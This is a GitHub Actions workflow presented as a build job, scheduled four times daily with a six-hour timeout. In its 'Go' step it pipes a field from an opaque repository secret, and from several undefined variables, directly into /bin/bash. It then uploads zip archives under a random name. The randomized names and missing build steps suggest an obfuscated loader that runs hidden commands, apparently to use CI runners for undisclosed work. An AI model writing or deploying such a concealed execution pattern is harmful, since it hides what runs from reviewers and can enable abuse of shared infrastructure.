name: Build Workflow
on:
  workflow_dispatch:

  schedule:
    - cron: '3 2,8,14,20 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Go
        env:
          phk593: ${{ secrets.phk593 }}
        run: |
          printf '%s' "$phk593" | jq -r .gfn43863 | /bin/bash
          echo $lxkz9979 | jq -r .ou707 | /bin/bash
          echo $n45972 | jq -r .qb71639 | /bin/bash
          printf '%s' "$igknc7681" | jq -r .uoc05848 | /bin/bash
          echo $xwdk19 | jq -r .qnkcq775 | /bin/bash

      - name: Archive results
        uses: actions/upload-artifact@v4
        with:
          name: iCcBVAc9
          path: "*.zip"
          retention-days: 1
